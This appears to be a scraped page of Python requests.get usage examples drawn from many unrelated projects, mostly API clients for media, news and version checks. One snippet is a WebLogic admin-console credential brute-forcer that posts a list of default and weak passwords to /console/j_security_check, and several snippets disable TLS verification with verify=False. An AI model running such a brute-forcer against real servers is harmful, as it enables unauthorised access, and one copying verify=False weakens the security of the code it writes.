        logger.success("Step 1: Exploitable!")
    else:
        logger.error("Step 1: It's not exploitable!")
예제 #36
0
    def getURL(self, url, headers=None):

        try:
            r = requests.get(url)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError), e:
            logger.log(u"Error loading "+self.name+" URL: " + str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
예제 #37
0
    def pull(self, num):
        """Go fetch the paper boy!"""
        try:
            url = 'http://api.nytimes.com/svc/news/v3/content/nyt/u.s..json?&api-key=' + TopStories.key
            package = Requests.get(url)
            newspaper = package.json()

        except:
            return False

        for article in newspaper['results']:
            if len(self.articles) < num:
                title = article['title']
                content = article['abstract']
                source_url = article['url']
                img_url = ''
                if title.lower().find('briefing') != -1:
                    continue
                for media_num in range(len(article['multimedia'])):
                    if article['multimedia'][media_num]['format'] == 'Normal':
                        img_url = article['multimedia'][media_num]['url']
                        break
                if img_url == '':
                    continue
                new_article = Article(title, content, img_url, url)
                self.articles.append(new_article)

        return self.articles
예제 #38
0
def search(query, lang, max_hits):
    """Use Wikipedia's search API to find matches
    """
    # Convert Alfred's decomposed utf-8 to composed as expected by the endpoint
    q = unicodedata.normalize('NFC', query.decode('utf-8')).encode('utf-8')
    try:
        response = requests.get(
            url='https://{lang}.wikipedia.org/w/api.php'.format(lang=lang),
            params={'action': 'query',
                    'format': 'json',
                    'utf8': '',
                    # Build generator
                    'generator': 'search',
                    'gsrsearch': q,
                    'gsrlimit': max_hits,
                    # Get properties
                    'prop': 'extracts|info',
                    'explaintext': '',
                    'exintro': '',
                    'exlimit': 'max',
                    'inprop': 'url'})
        response.raise_for_status()  # Raise error on 4xx and 5xx status codes
        response = json.loads(response.content.decode('utf-8'))
        results = response['query']['pages'].values()
    except KeyError:
        raise ResultsException(query)
    except requests.exceptions.RequestException as e:
        raise RequestException(e.request)

    return results
def exploit(ip):
    result = []
    if Domain:
        for domain in Domain:
            try:
                login_url = domain+'/console/login/LoginForm.jsp'
                resp = requests.get(login_url, timeout=TIME_OUT, proxies=MY_PROXY, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
            except Exception,e:
                logging.error(e)
                continue
            if "WebLogic" in resp.text and dict(resp.headers).has_key('set-cookie'):
                result.append('%s >>>> Weblogic管理口'%login_url)
                cookies={}
                for line in resp.headers['set-cookie'].split(';'):
                    if '=' in line:
                        name,value=line.strip().split('=',1)
                        cookies[name]=value
                flag_list=['<title>WebLogic Server Console</title>','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/']
                user_list=['weblogic']
                pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
                for user in user_list:
                    for password in pass_list:
                        try:
                            login_url = domain+'/console/j_security_check'
                            data = {'j_username':user, 'j_password':password, 'j_character_encoding':'UTF-8'}
                            resp = requests.post(login_url, data=data, proxies=MY_PROXY, cookies=cookies, timeout=TIME_OUT, headers={"User-Agent": random.choice(USER_AGENT_LIST)}, allow_redirects=True, verify=False)
                        except Exception,e:
                            logging.error(e)
                            continue
                        # print resp.text
                        for flag in flag_list:
                            if flag in resp.text:
                                result.append('%s >>>> 存在Weblogic弱口令%s:%s'%(domain,user,password))
예제 #40
0
    def getSOSProcedure(self, name):

        params = {
            'service': 'SOS',
            'version': '1.0.0',
            'request': 'GetObservation',
            'observedProperty': ':',
            'offering': 'temporary',
            'responseFormat': 'application/json',
            'procedure': name
        }

        print "Requesting %s GetObservation: %s/%s" % (name, self.host,
                                                       self.service)
        #print params

        res = req.get("%s/%s" % (self.host, self.service),
                      params=params,
                      auth=self.auth)

        #print res.json()

        json = res.json()['ObservationCollection']['member'][0]

        return json
예제 #41
0
    def getURL(self, url, headers=None):

        try:
            r = requests.get(url, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError), e:
            logger.log(u"Error loading " + self.name + " URL: " + str(sys.exc_info()) + " - " + ex(e), logger.ERROR)
            return None
예제 #42
0
파일: tmdb.py 프로젝트: chr1831/XDM
 def getJSON(self, url, language=None):
     language = language or config['language']
     page = requests.get(url, params={'language': language}).content
     try:
         return simplejson.loads(page)
     except:
         return simplejson.loads(page.decode('utf-8'))
예제 #43
0
파일: users.py 프로젝트: MCME/WebStatus
def fetch_yaml():
    '''fetches yaml file from mcmiddleearth,
       loads, parses, and returns python object'''
    response = requests.get(MCME_YAML_URL)
    raw_yaml = response.content
    response.close()
    return yaml.load(raw_yaml)
예제 #44
0
파일: TheGamesDB.py 프로젝트: chr1831/XDM
    def _searchForElement(self, term='', id=0):
        self.progress.reset()
        self._pCache = {}
        mt = MediaType.get(MediaType.identifier == 'de.lad1337.games')
        mtm = mt.manager
        rootElement = mtm.getFakeRoot(term)
        payload = {}
        url = 'http://thegamesdb.net/api/GetGame.php?'
        if term and not id:
            payload['name'] = term
        else:
            payload['id'] = id
        #r = requests.get('http://thegamesdb.net/api/GetGame.php', params=payload)
        r = requests.get(url, params=payload)
        log('tgdb search url ' + r.url)
        root = ET.fromstring(r.text.encode('utf-8'))

        baseImgUrlTag = root.find('baseImgUrl')
        if baseImgUrlTag is not None:
            base_url = baseImgUrlTag.text
        else:
            base_url = "http://thegamesdb.net/banners/"

        for curGame in root.getiterator('Game'):
            self._createGameFromTag(curGame, base_url, rootElement)

        log("%s found %s games" % (self.name, len(list(rootElement.children))))

        return rootElement
예제 #45
0
파일: web.py 프로젝트: HeyMan7/Code
def http(method, rdata='all', uri=None, timeout=7, params=None, data=None, headers=None, **kwargs):
    if not method:
        raise 'No method specified'
    if not uri:
        raise 'Invalid URI supplied'
    if not headers:
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.4 (KHTML, '
                          'like Gecko) Chrome/22.0.1229.79 Safari/537.4',
            'Cache-Control': 'max-age=0',
            'Accept-Encoding': 'gzip,deflate,sdch',
            'X-Service': 'Code Python IRC Bot'
        }
    if method == 'get':
        response = requests.get(uri, timeout=timeout, params=params, headers=headers, **kwargs)
    elif method == 'post':
        response = requests.post(uri, timeout=timeout, data=data, headers=headers, **kwargs)
    elif method == 'head':
        response = requests.head(uri, timeout=timeout, data=data, headers=headers, **kwargs)
    else:
        raise 'Method not supported'

    if rdata == 'all':
        return response
    elif rdata == 'json':
        return response.json()
    elif rdata == 'text':
        return response.text
    elif rdata == 'headers':
        return response.headers
    else:
        raise 'Return data not supported'
예제 #46
0
파일: mb.py 프로젝트: ChapeLu/mylar
def pullsearch(comicapi, comicquery, offset, explicit, type):
    u_comicquery = urllib.quote(comicquery.encode('utf-8').strip())
    u_comicquery = u_comicquery.replace(" ", "%20")

    if explicit == 'all' or explicit == 'loose':
        PULLURL = mylar.CVURL + 'search?api_key=' + str(comicapi) + '&resources=' + str(type) + '&query=' + u_comicquery + '&field_list=id,name,start_year,first_issue,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&page=' + str(offset)

    else:
        # 02/22/2014 use the volume filter label to get the right results.
        # add the 's' to the end of type to pluralize the caption (it's needed)
        if type == 'story_arc':
            u_comicquery = re.sub("%20AND%20", "%20", u_comicquery)
        PULLURL = mylar.CVURL + str(type) + 's?api_key=' + str(comicapi) + '&filter=name:' + u_comicquery + '&field_list=id,name,start_year,site_detail_url,count_of_issues,image,publisher,deck,description&format=xml&offset=' + str(offset) # 2012/22/02 - CVAPI flipped back to offset instead of page
    #all these imports are standard on most modern python implementations
    #logger.info('MB.PULLURL:' + PULLURL)

    #new CV API restriction - one api request / second.
    if mylar.CVAPI_RATE is None or mylar.CVAPI_RATE < 2:
        time.sleep(2)
    else:
        time.sleep(mylar.CVAPI_RATE)

    #download the file:
    payload = None
    verify = False

    try:
        r = requests.get(PULLURL, params=payload, verify=verify, headers=mylar.CV_HEADERS)
    except Exception, e:
        logger.warn('Error fetching data from ComicVine: %s' % (e))
        return
예제 #47
0
def getRepositories(my_globals):
    from lib import requests
    from lib.requests.auth import HTTPBasicAuth

    url = my_globals["repo_api"]["url"]
    user = my_globals["repo_api"]["username"]
    password = my_globals["repo_api"]["password"]

    headers = {'Content-Type': "application/json", 'User-Agent': "setup tool"}

    req = requests.get(url,
                       headers=headers,
                       auth=HTTPBasicAuth(user, password))
    # from pprint import pprint
    # pprint(req)

    # p = urllib2.HTTPPasswordMgrWithDefaultRealm()
    # p.add_password(None, url, user, password)

    my_globals["repoJSON"] = req.json()

    # Pretty print for debugging
    # print json.dumps(my_globals["repoJSON"],
    #                    sort_keys=True,
    #                    indent=2, separators=(',', ': '))

    # save to file
    with open(os.environ['HOME'] + "/.PUNCH/current_beanstalk_repos.json",
              "w") as outFile:
        json.dump(my_globals["repoJSON"], outFile)

    # print repo names for user
    my_globals["allTitles"] = []
    for repo in my_globals["repoJSON"]:
        my_globals["allTitles"].append(repo["repository"]["title"])
    # print ", ".join(my_globals["allTitles"])
    # Columns!
    allTitles = my_globals["allTitles"]
    longestName = 0
    for name in allTitles:
        l = len(name)
        if l > longestName:
            longestName = l + 1

    colCount = int(math.floor(80 / longestName))
    rowCount = (len(allTitles) / colCount) + 1

    # Take the titles and split them into columns
    columns = [
        allTitles[i:i + rowCount] for i in range(0, len(allTitles), rowCount)
    ]

    # Equalize the lengths of the columns
    for i in range(1, colCount):
        while len(columns[i]) < len(columns[i - 1]):
            columns[i].append("")

    for row in zip(*columns):
        print "".join(str.ljust(str(i), longestName) for i in row)
예제 #48
0
파일: newpull.py 프로젝트: hjone72/mylar
def newpull():
    pagelinks = "http://www.previewsworld.com/Home/1/1/71/952"

    try:
        r = requests.get(pagelinks, verify=False)

    except Exception, e:
        logger.warn('Error fetching data: %s' % e)
예제 #49
0
파일: newpull.py 프로젝트: cerinthus/mylar
def newpull():
    pagelinks = "http://www.previewsworld.com/Home/1/1/71/952"

    try:
        r = requests.get(pagelinks, verify=False)

    except Exception, e:
        logger.warn("Error fetching data: %s" % e)
예제 #50
0
    def getURL(self, url, post_data=None, headers=None):

        try:
            url = urljoin(url, urlparse(url).path.replace('//', '/'))
            response = requests.get(url, verify=False)
        except (requests.exceptions.ConnectionError, requests.exceptions.HTTPError), e:
            logger.log(u"Error loading " + self.name + " URL: " + ex(e), logger.ERROR)
            return None
예제 #51
0
파일: scan.py 프로젝트: xuacker/Scanver
 def baiduce(self,target):
     try:
         res = requests.get('http://ce.baidu.com/index/getRelatedSites?site_address=%s'%target)
         res = json.loads(res.text)
         for subdomain in [v.get('domain') for v in res.get('data',[])]:
             for answer in self.recv(subdomain):
                 self.result.add((subdomain,answer.address))
     except:pass
예제 #52
0
def get_res_tk(url):
    from lib import requests
    try:
        res = requests.get(url, timeout=1.5)
        print res.raise_for_status()
        return res
    except Exception:
        return res
예제 #53
0
 def _getWatchlist(self, watchURL, username, password, apikey):
     url = self._makeURL(watchURL, apikey, username)
     log.debug("Calling trakt url: %s" % url, censor={apikey: 'apikey', username: '******'})
     try:
         r = requests.get(url, auth=(username, self._hash(password)))
         return r.json()
     except:
         return []
예제 #54
0
파일: Sabnzbd.py 프로젝트: sinfuljosh/XDM
    def _getHistory(self):

        payload = {"apikey": self.c.apikey, "mode": "history", "output": "json"}
        r = requests.get(self._baseUrl(), params=payload)
        log("Sab hitory url %s" % r.url, censor={self.c.apikey: "apikey"})
        response = r.json()
        self._history = response["history"]["slots"]
        return self._history
예제 #55
0
def getLatestVersion_FromGit():
    # Don't call directly, use getLatestVersion as wrapper.
    # Also removed reference to global variable setting.
    latest_version = 'Unknown'

    # Can only work for non Windows driven installs, so check install type
    if lazylibrarian.CONFIG['INSTALL_TYPE'] == 'win':
        logmsg('debug', '(getLatestVersion_FromGit) Error - should not be called under a windows install')
        latest_version = 'WINDOWS INSTALL'
    else:
        # check current branch value of the local git repo as folks may pull from a branch not master
        branch = lazylibrarian.CONFIG['GIT_BRANCH']

        if branch == 'InvalidBranch':
            logmsg('debug', '(getLatestVersion_FromGit) - Failed to get a valid branch name from local repo')
        else:
            if branch == 'Package':  # check packages against master
                branch = 'master'
            # Get the latest commit available from github
            url = 'https://api.github.com/repos/%s/%s/commits/%s' % (
                lazylibrarian.CONFIG['GIT_USER'], lazylibrarian.CONFIG['GIT_REPO'], branch)
            logmsg('debug',
                   '(getLatestVersion_FromGit) Retrieving latest version information from github command=[%s]' % url)

            timestamp = check_int(lazylibrarian.CONFIG['GIT_UPDATED'], 0)
            age = ''
            if timestamp:
                # timestring for 'If-Modified-Since' needs to be english short day/month names and in gmt
                # we already have english month names stored in MONTHNAMES[] but need capitalising
                # so use hard coded versions here instead
                DAYNAMES = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
                MONNAMES = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
                tm = time.gmtime(timestamp)
                age = "%s, %02d %s %04d %02d:%02d:%02d GMT" %(DAYNAMES[tm.tm_wday], tm.tm_mday,
                    MONNAMES[tm.tm_mon], tm.tm_year, tm.tm_hour, tm.tm_min, tm.tm_sec)
            try:
                headers = {'User-Agent': USER_AGENT}
                if age:
                    logmsg('debug', '(getLatestVersion_FromGit) Checking if modified since %s' % age)
                    headers.update({'If-Modified-Since': age})
                proxies = proxyList()
                timeout = check_int(lazylibrarian.CONFIG['HTTP_TIMEOUT'], 30)
                r = requests.get(url, timeout=timeout, headers=headers, proxies=proxies)

                if str(r.status_code).startswith('2'):
                    git = r.json()
                    latest_version = git['sha']
                    logmsg('debug', '(getLatestVersion_FromGit) Branch [%s] Latest Version has been set to [%s]' % (
                        branch, latest_version))
                elif str(r.status_code) == '304':
                    latest_version = lazylibrarian.CONFIG['CURRENT_VERSION']
                    logmsg('debug', '(getLatestVersion_FromGit) Not modified, currently on Latest Version')
            except Exception as e:
                logmsg('warn', '(getLatestVersion_FromGit) Could not get the latest commit from github')
                logmsg('debug', 'git %s for %s: %s' % (type(e).__name__, url, str(e)))
                latest_version = 'Not_Available_From_GitHUB'

    return latest_version
예제 #56
0
    def processEpisode(self, dirName, nzbName=None, status=0, clientAgent='manual', inputCategory=None):
        # auto-detect correct section
        section = nzbtomedia.CFG.findsection(inputCategory)
        if not section:
            logger.error(
                "We were unable to find a section for category %s, please check your autoProcessMedia.cfg file." % inputCategory)
            return 1

        host = nzbtomedia.CFG[section][inputCategory]["host"]
        port = nzbtomedia.CFG[section][inputCategory]["port"]
        username = nzbtomedia.CFG[section][inputCategory]["username"]
        password = nzbtomedia.CFG[section][inputCategory]["password"]

        try:
            ssl = int(nzbtomedia.CFG[section][inputCategory]["ssl"])
        except:
            ssl = 0

        try:
            web_root = nzbtomedia.CFG[section][inputCategory]["web_root"]
        except:
            web_root = ""

        try:
            remote_path = nzbtomedia.CFG[section][inputCategory]["remote_path"]
        except:
            remote_path = None

        nzbName, dirName = convert_to_ascii(nzbName, dirName)

        params = {}
        params['nzb_folder'] = dirName
        if remote_path:
            dirName_new = os.path.join(remote_path, os.path.basename(dirName)).replace("\\", "/")
            params['nzb_folder'] = dirName_new

        if nzbName != None:
            params['nzb_name'] = nzbName

        if ssl:
            protocol = "https://"
        else:
            protocol = "http://"

        url = "%s%s:%s%s/post_process" % (protocol, host, port, web_root)
        logger.debug("Opening URL: %s" % (url), section)

        try:
            r = requests.get(url, params=params, auth=(username, password), stream=True)
        except requests.ConnectionError:
            logger.error("Unable to open URL", section)
            return 1 # failure

        for line in r.iter_lines():
            if line: logger.postprocess("%s" % (line), section)

        time.sleep(60) #wait 1 minute for now... need to see just what gets logged and how long it takes to process
        return 0 # Success
예제 #57
0
파일: core.py 프로젝트: Bonekicker/SickRage
 def response(self):
     try:
         response = requests.get(str(self))
         rjson = response.json()
         if not isinstance(rjson, dict):
             raise Exception(response.text)
         return rjson
     except Exception as e:
         raise ResponseFanartError(str(e))